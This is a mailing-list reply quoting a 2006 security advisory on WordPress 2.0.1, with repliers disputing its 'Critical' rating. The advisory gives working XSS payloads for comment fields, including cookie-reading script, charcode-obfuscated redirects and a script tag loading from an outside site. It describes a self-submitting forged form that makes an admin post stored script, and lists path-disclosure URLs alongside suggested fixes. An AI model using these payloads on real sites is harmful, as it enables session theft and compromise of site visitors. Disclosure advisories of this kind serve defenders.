-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > Risk: Critical! Impact: XSS, Full Path Disclosure, Directory > Listing Here a critical bug is an arbitrary command execution, account ownage, etc an XSS isn't at all critical... > <+ Full path disclosure & Directory listing +> When I discovered > this bug, I reported it to some pepople before public disclosure, I > was noticed that this isn't new and I decided to look why they > haven't patch this bug. so it's not that critical, medium but nothing critical ... Javor Ninov wrote: > wp-content/ is also prone to directory listing > > > Javor Ninov aka DrFrancky > > k4p0k4p0@xxxxxxxxxxx wrote: >> /* >> --------------------------------------------------------------- >> [N]eo [S]ecurity [T]eam [NST]® WordPress 2.0.1 Multiple >> Vulnerabilities >> --------------------------------------------------------------- >> Program : WordPress 2.0 Homepage: http://www.wordpress.org >> Vulnerable Versions: WordPress 2.0.1 & lower ones Risk: Critical! >> Impact: XSS, Full Path Disclosure, Directory Listing >> >> -> WordPress 2.0.1 Multiple Vulnerabilities <- >> --------------------------------------------------------------- >> >> - Description >> --------------------------------------------------------------- >> WordPress is a state-of-the-art semantic personal publishing >> platform with a focus on aesthetics, web standards, and >> usability. What a mouthful. WordPress is both free and priceless >> at the same time. >> >> - Tested >> --------------------------------------------------------------- >> Tested in localhost & many blogs >> >> - Bug >> --------------------------------------------------------------- >> The vendor was contacted about some other coding errors that are >> not described here, the vendor was noticed about these bugs when >> this advisory was published. >> >> <+ Multiple XSS +> There're multiple XSS in `post comment': >> >> [1] `name' variable is not filtered when it's assigned to `value' >> on the `<input>' in the form when the comment it's posted. [2] >> Happends the same as [1] with `website' variable. [3] `comment', >> this variable only filtered " and ' chars, this makes possible to >> use < and >, thus this permit an attacker to inject any HTML (or >> script) code that he/she want but without any " or ' character, >> this only happends if the user that post the comment it's the >> admin (any registered kind of `user'). >> >> If you (or victim) is a unregistered user, you can use " and ' in >> your HTML/script Injection using `name' or `website' variables, >> but if the victim is the admin or a registered user these 2 >> fields described above aren't availabe in the form so you cannot >> even give a value to them. The only remaining option it's to use >> the `comment' variable but here we have the problem that we >> cannot use " or ' in HTML/SCRIPT Injected and we have to make the >> admin to post the comment (POST method). >> >> <+ Full path disclosure & Directory listing +> When I discovered >> this bug, I reported it to some pepople before public disclosure, >> I was noticed that this isn't new and I decided to look why they >> haven't patch this bug. >> >> As this bug it isn't patched yet, I tryed to know why and I found >> something like this in their forum (I don't know if the person >> that posted this was the admin but it gives the explanation): >> (Something like the following, it's not textual). `... these bugs >> are caused by badly configured .ini file, it's not a bug >> generated by the script so it cannot be accepted as a bug of >> WordPress...'. This is not an acceptable answer, if you think it >> is, a bug caused because of register_globals is Off it's .ini >> fault and not the script, they have to be kidding, if they want >> to make good software, they have to make as far as the language >> can, to prevent all bugs. >> >> There're multiple files that don't check if they are been call >> directly. This is a problem because they expect that functions >> that the script is going to be called to be declared. This kind >> of bug it's taken as a Low Risk bug, but it can help to future >> attacks. >> >> - Exploit >> --------------------------------------------------------------- >> -- Cross Site Scripting (XSS) PoC: [1] Post a comment with the >> following values (as unregistered user): (No possible profit) >> >> Name : "><script>alert("WordPress PoC from");</script> Mail : >> neosecurityteam@xxxxxxx Website: >> "><script>alert("[N]eo[S]ecurity[T]eam >> www.neosecurityteam.net");</script> Comment: >> www.neosecurityteam.net/foro/ >> >> The injected HTML code only affects the user that posted it, not >> others. >> >> [2] This way it's more intresting and useful. In this case the >> HTML Injected will stay in the board affecting each person who >> see it. But we have two problems: [I ]- This comment must be >> posted by the admin [II]- We only can use the `comment' field, >> because the admin form to make the comment doesn't need the >> `name' or `website'. Also the injected code cannot have any " or >> ' chars. >> >> Here are my solutions: [I ]- We cannot give to the admin a >> `malicius' URL to steal the cookie because it isn't via GET, it's >> via POST. So the solution it's to make a copy form of the real >> one and set the default values to the corresonding field >> (`comment') to make the stealing. Also make the form submit >> itself when the page loads. Thus, we give the admin the URL of >> this form and he/she will post the comment with the values we set >> before. :) [II]- We can only use this field to make the >> injection, the `big' problem its that we cannot use " or ' chars >> wich means that something like window.location = >> "http://www.google.com.uy";; won't work. >> >> Here are some real examples: >> >> - <script>alert(document.cookie)</script> - >> <script>alert(String.fromCharCode(80,111,67,32,111,102,32,87,111,114, >> >> 100,80,114,101,115,115,32,98,121,32,75,52,80,48,32,102,114,111,109,32, >> 78,83,84))</script> - <script >> src=http://www.neosecurityteam.net></script> - >> <script>document.location = >> String.fromCharCode(104,116,116,112,58,47, >> 47,119,119,119,46,110,101,111,115,101,99,117,114,105,116,121,116,101, >> 97,109,46,110,101,116)</script> >> >> As you can see this bug it's exploitable, it's only knowing a bit >> deeper how to do XSS under some conditions. There're more >> possibilities than described above, investigate yourself. >> >> -- Full path disclosure & Directory Listing Directory Listing: >> www.victim.com/wordpress/wp-includes/ >> >> Full path disclosure: >> www.victim.com/wordpress/wp-includes/default-filters.php >> www.victim.com/wordpress/wp-includes/template-loader.php >> www.victim.com/wordpress/wp-admin/edit-form-advanced.php >> www.victim.com/wordpress/wp-admin/edit-form-comment.php >> www.victim.com/wordpress/wp-includes/rss-functions.php >> www.victim.com/wordpress/wp-admin/admin-functions.php >> www.victim.com/wordpress/wp-admin/edit-link-form.php >> www.victim.com/wordpress/wp-admin/edit-page-form.php >> www.victim.com/wordpress/wp-admin/admin-footer.php >> www.victim.com/wordpress/wp-admin/menu-header.php >> www.victim.com/wordpress/wp-includes/locale.php >> www.victim.com/wordpress/wp-admin/edit-form.php >> www.victim.com/wordpress/wp-includes/wp-db.php >> www.victim.com/wordpress/wp-includes/kses.php >> www.victim.com/wordpress/wp-includes/vars.php >> www.victim.com/wordpress/wp-admin/menu.php >> www.victim.com/wordpress/wp-settings.php >> >> - Solutions >> --------------------------------------------------------------- >> <+ Cross Site Scripting (XSS) +> Change lines ~21 of >> 'wp-comments-post.php' to: $comment_author = >> htmlentities(trim($_POST['author'])); $comment_author_email = >> htmlentities(trim($_POST['email'])); $comment_author_url = >> htmlentities(trim($_POST['url'])); $comment_content = >> htmlentities(trim($_POST['comment'])); >> >> <+ Full Path Disclosure & Directory Listing +> In the first line >> of each vulnerable file you should write: if >> (eregi('name_of_the_file.php', $_SERVER['PHP_SELF'])) die('You >> are not allowed to see this page directly'); >> >> - References >> --------------------------------------------------------------- >> http://NeoSecurityTeam.net/advisories/Advisory-17.txt >> >> - Credits >> -------------------------------------------------------------- >> Discovered by K4P0-> k4p0k4p0[at]hotmail[dot]com >> >> [N]eo [S]ecurity [T]eam [NST]® - http://NeoSecurityTeam.net/ >> >> Irc.InfoGroup.cl #neosecurityteam Questions? (Eng | Spa) -> >> http://NeoSecurityTeam.net/foro/ >> >> - Greets >> --------------------------------------------------------------- >> Paisterist HaCkZaTaN Link Daemon21 erg0t NST Comunity! >> >> @@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ >> '@@@@@''@@'@@@''''''''@@''@@@''@@ '@@'@@@@@@''@@@@@@@@@'''''@@@ >> '@@'''@@@@'''''''''@@@''''@@@ @@@@''''@@'@@@@@@@@@@''''@@@@@ */ > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBRAYZ16+LRXunxpxfAQLBShAAxf21wL1qEpzb1ATERVMwvMoGPKC9PQ3D CdOZ9Sp0RTZTxLvpWj/6Q3dWp1jn4JB4feXOsD2r55Z45APHcsFNVlUpz/NkrSE+ mEdcj6BhvYq5vPCN8MJbI89L5x5wovKugPA3LGeOFXDnkaCJQXjXJskHV9uJvVLw Ko1qfr7hmChLWG/1U/4Dfo4Mndq8kw0S7AIwoEMNogd0wgO/sDYrCXyRm6XIGtRf BM33Gai17YSPi0TlJe4X8+Cyr0ibEKbmJVCJ1cm/s1bQDYHrct0fMb/zRzwczWWe oSOXK6rM8COQMh9MS+nlCsLIZvkir7Ztp486MOjZ7rkNKIb5q9TIYHzg7UsOh7yM QOz1tI26Apxy0w1dNNX/fyKAhHMmcMtI1jfMOC/Bo+3L+JZedcCTo4uHkp9xzOkg k2I8j/QvScdSF+iBueIe9QZQDfd7n5GuoRDpMn47FOAOmMonx4qD+mOvFwPFPuZv sbitRSEa5BQTYCU5CRflalzEX+H5F9aCrMqQGcRhlygC+ONXDuTCVroR9Cticxbt QkIw6kgXd9ndUtiaVjG0gObB72NQxh/CMlQCClgZwhgHFSVeHbxUhlofwytjO0Y3 /ss9ehywwLTirq90jjEN51Q6Auun3YXeXxGH5XBkMI9gxo2Wj4x5TudpeS6cJTji N8IhY+gLiQA= =LKCE -----END PGP SIGNATURE-----
